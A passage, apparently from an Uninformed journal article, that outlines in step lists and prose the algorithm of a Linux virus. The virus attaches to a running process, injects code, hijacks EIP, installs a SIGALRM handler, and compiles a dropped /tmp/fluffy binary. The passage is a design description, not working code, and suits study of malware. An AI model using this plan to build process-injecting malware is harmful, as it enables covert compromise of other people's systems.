Informative Information for the Uninformed | ||||||||||||||
|
||||||||||||||
The AlgorithmHaving the motives, tools and knowledge, here's the plan:Infector: --------- * Attach to process > Wait for process to stop > Query process registers > Calculate previous stack page beginning > Store current EIP > Inject pre-virus and virus code > Set EIP to pre-virus code > Deattach from process Pre-Virus: ---------- * Register SIGALRM signal > Schedule SIGALRM (14secs) > Give control back to process Virus: ------ * SIGALRM handler invoked > Check for /tmp/fluffy > Create fluffy.c > Compile fluffy.c > Remove /tmp/fluffy.c > Chmod /tmp/fluffy > Jmp to pre-virus code The infecting process is divided into two steps, the infector injects the virus and the pre-virus code to the infected process. Afterward it sets the process EIP to point to the pre-virus code. This independently registers to the SIGALRM signal within the infected process and calculates the virus location for the signal callback function. Then it schedules a SIGALRM signal and passes the control back to the process. Once the signal caught the virus it kicks in as the signal handler.
|